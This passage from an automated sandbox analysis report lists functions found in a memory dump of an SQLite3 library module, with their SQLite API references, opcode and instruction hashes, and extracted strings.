                                                                                                    • Opcode Fuzzy Hash: 969964f748c3dbf5faddc566b324f44d6478a9ff4673fe3bfaa9967b1d7da70a
                                                                                                    • Instruction Fuzzy Hash: DF218EB15087249FDB04DF59E4A06A5BBE0FF49320F24D55EEDA84B391D335C881CB82
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E29258
                                                                                                    • sqlite3_bind_zeroblob.SQLITE3 ref: 61E2927D
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E2929D
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2187339821-0
                                                                                                    • Opcode ID: c8608e4cb6ee0876b57b61b2180a92bdbece601e1911d1318902c1edc24ed192
                                                                                                    • Instruction ID: 71bda0ac54a0e0f173b124d792c8bb8ee147aaa1bb55a03425212694f7a1fb7d
                                                                                                    • Opcode Fuzzy Hash: c8608e4cb6ee0876b57b61b2180a92bdbece601e1911d1318902c1edc24ed192
                                                                                                    • Instruction Fuzzy Hash: 7E012C796046699FCB00DFA9D0D095ABBF5FFCA724F24C46AE8488B314D734E851CB92
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16E4C
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16EAF
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 48c463444376657ded0004d134018bdbfcc168c884925203ef9f971fdb27fca6
                                                                                                    • Instruction ID: 6f1205b9ad66009288743075ffbbb1bc87bc448d2be142b5ebb8d24004af2559
                                                                                                    • Opcode Fuzzy Hash: 48c463444376657ded0004d134018bdbfcc168c884925203ef9f971fdb27fca6
                                                                                                    • Instruction Fuzzy Hash: 60210C34A042498FDB04DFA9C485BD9FBF4FF49318F1482A9E818AB351D375E981CB91
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16D04
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16D44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28E94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29148
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29035
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E290DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E290B2
                                                                                                      • Part of subcall function 61E29044: sqlite3_mutex_leave.SQLITE3 ref: 61E29083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Opcode Fuzzy Hash: 4f5fac0df7391be7681725dc59cc5a154345831af7e83db8f2e7eea72c29f52b
                                                                                                    • Instruction Fuzzy Hash: E8F01C756082199BDB04DE08E8A0A9A7BE5FB08374F20C12AFC2587780C671E9508BD0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bec25b551eb354892b9af8da31309813ac55e7b9a464165a5093f9e8343794bc
                                                                                                    • Instruction ID: 2813161d6bdb955eaf3ab68c1a7d03ab9169fce3e62afef336c5361aec6f7a92
                                                                                                    • Opcode Fuzzy Hash: bec25b551eb354892b9af8da31309813ac55e7b9a464165a5093f9e8343794bc
                                                                                                    • Instruction Fuzzy Hash: A7D012777093085F7B00CD99ACC0626779AE788238B30C336ED1C87309D532DC108594
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a16c13c49520f40f0d60a905d10e97620d50312b1343a0282da68c3504f34f1
                                                                                                    • Instruction ID: b102c9bc9f6e664d14128b601affc410d9f98154bbcd73b306bd9b71fb2a438c
                                                                                                    • Opcode Fuzzy Hash: 4a16c13c49520f40f0d60a905d10e97620d50312b1343a0282da68c3504f34f1
                                                                                                    • Instruction Fuzzy Hash: FAD042B450530DABDB00CF05D8C599ABBA4FB08264F508519FD1847301C371E9508AA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d14c322e95e75edd63900fddb1959088059b19c42da3efe683381bed354797be
                                                                                                    • Instruction ID: dce98d3074e2cd64e076945d3adbdb6e0cf8e92e3b7b92136b659279ffc19a3f
                                                                                                    • Opcode Fuzzy Hash: d14c322e95e75edd63900fddb1959088059b19c42da3efe683381bed354797be
                                                                                                    • Instruction Fuzzy Hash: FBD042B450530DABDB00CF05D8C099ABBA4FB08364F508519FD1847301C371E9508AA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d1597ba08e16207bc585f88e41cad08ce7166ad2665480622a7a6546a95354c9
                                                                                                    • Instruction ID: cb7424858764b716d9f35c55a2eb3f01ce31a55af644a028291814028747478a
                                                                                                    • Opcode Fuzzy Hash: d1597ba08e16207bc585f88e41cad08ce7166ad2665480622a7a6546a95354c9
                                                                                                    • Instruction Fuzzy Hash: DBC08C3035430C8F6B00CEFEE440D6237E8AB04B20710C050E818CBB20D631FDA08580
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                    • Instruction ID: ff50fd2c8bf0e8bd2a405e50f4e867cb0310499d3bbc8f69fcb86d8fc05bc264
                                                                                                    • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                    • Instruction Fuzzy Hash: 81B0922061820A8B6B08CE98D480A7777AEBB88D05B28C465A81C8AA05F732E99192C0
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E389FE
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E38A2F
                                                                                                      • Part of subcall function 61E234E3: sqlite3_vsnprintf.SQLITE3 ref: 61E23504
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38B73
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38BB0
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38BEB
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E38C1D
                                                                                                    • sqlite3_randomness.SQLITE3 ref: 61E38C39
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5$a
                                                                                                    • API String ID: 3041771859-3248843131
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                    • String ID: Ta$\$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                    • API String ID: 3752053736-69930158
                                                                                                    APIs
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24E6A
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24E76
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24E83
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24EAB
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24EB7
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24EC6
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24EE6
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24EF2
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24F01
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24F2D
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24F39
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24F47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                    • String ID: ba
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                    • String ID: .$sqlite3_extension_init$te3_
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                                    • String ID: @$access$cache$foa
                                                                                                    APIs
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E528ED
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E528F8
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E528D6
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E52916
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E52945
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E52956
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_result_error_nomemsqlite3_value_textsqlite3_vmprintf
                                                                                                    • String ID: `a$fts5_expr$fts5_expr_tcl
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E39065
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E39091
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E390C4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E390E4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E390FA
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E3910E
                                                                                                    • sqlite3_realloc64.SQLITE3 ref: 61E391F1
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E39318
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave$sqlite3_realloc64sqlite3_snprintf
                                                                                                    • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                                                                    • String ID: [a
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28BB6: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5CB65), ref: 61E28BFA
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E5D324
                                                                                                    • sqlite3_prepare_v2.SQLITE3 ref: 61E5D363
                                                                                                    • sqlite3_step.SQLITE3 ref: 61E5D3B3
                                                                                                    • sqlite3_errmsg.SQLITE3 ref: 61E5D54A
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                                                                                    • String ID: d$d
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E3697F
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                                    • String ID: + $ NOT $ OR $"$$a$(,)?$.a
                                                                                                    • API String ID: 2841607023-2535319329
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                    • String ID: 9a$a
                                                                                                    • API String ID: 336169149-3987242933
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                                                                    • String ID:
                                                                                                    • API String ID: 3802728871-0
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E25755
                                                                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 61E25836
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E2585C
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25AD8
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25B05
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25B0F
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25B75
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E25C98
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                    • String ID: a
                                                                                                    • API String ID: 2444656285-581836851
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E0A172: sqlite3_free.SQLITE3 ref: 61E0A181
                                                                                                      • Part of subcall function 61E0A172: sqlite3_free.SQLITE3 ref: 61E0A18C
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E37D6B
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E37D7E
                                                                                                    • sqlite3_malloc64.SQLITE3 ref: 61E37D93
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3723316075-0
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                                                                    • String ID:
                                                                                                    • API String ID: 3428878466-0
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5430B
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E54316
                                                                                                    • sqlite3_reset.SQLITE3 ref: 61E54345
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5434F
                                                                                                      • Part of subcall function 61E51966: sqlite3_log.SQLITE3 ref: 61E5198A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E54360
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E54368
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E54399
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E543A6
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E543B1
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E543C2
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E543CD
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_finalize$sqlite3_logsqlite3_mutex_entersqlite3_reset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3265072988-0
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313487548-0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: false$null$true
                                                                                                    • API String ID: 0-2913297407
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                                    • String ID: 7
                                                                                                    • API String ID: 1657278834-1790921346
                                                                                                    APIs
                                                                                                    • sqlite3_malloc64.SQLITE3 ref: 61E6EA90
                                                                                                    • sqlite3_exec.SQLITE3 ref: 61E6EAC3
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 61E6EADD
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E6EAF1
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E6EB04
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E6EB11
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E6EB2A
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 61E6EB3F
                                                                                                      • Part of subcall function 61E09CDD: sqlite3_free.SQLITE3 ref: 61E09D0B
                                                                                                    • sqlite3_realloc64.SQLITE3 ref: 61E6EB63
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 61E6EB75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 3621699333-0
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E530FA
                                                                                                      • Part of subcall function 61E51966: sqlite3_log.SQLITE3 ref: 61E5198A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53105
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53110
                                                                                                      • Part of subcall function 61E51966: sqlite3_mutex_enter.SQLITE3 ref: 61E519A9
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5311B
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53126
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53131
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53152
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5314A
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5315D
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53165
                                                                                                      • Part of subcall function 61E0A3E4: sqlite3_free.SQLITE3 ref: 61E0A407
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_free$sqlite3_mutex_enter$sqlite3_log
                                                                                                    • String ID:
                                                                                                    • API String ID: 3407354183-0
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E530FA
                                                                                                      • Part of subcall function 61E51966: sqlite3_log.SQLITE3 ref: 61E5198A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53105
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53110
                                                                                                      • Part of subcall function 61E51966: sqlite3_mutex_enter.SQLITE3 ref: 61E519A9
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5311B
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53126
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53131
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53152
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5314A
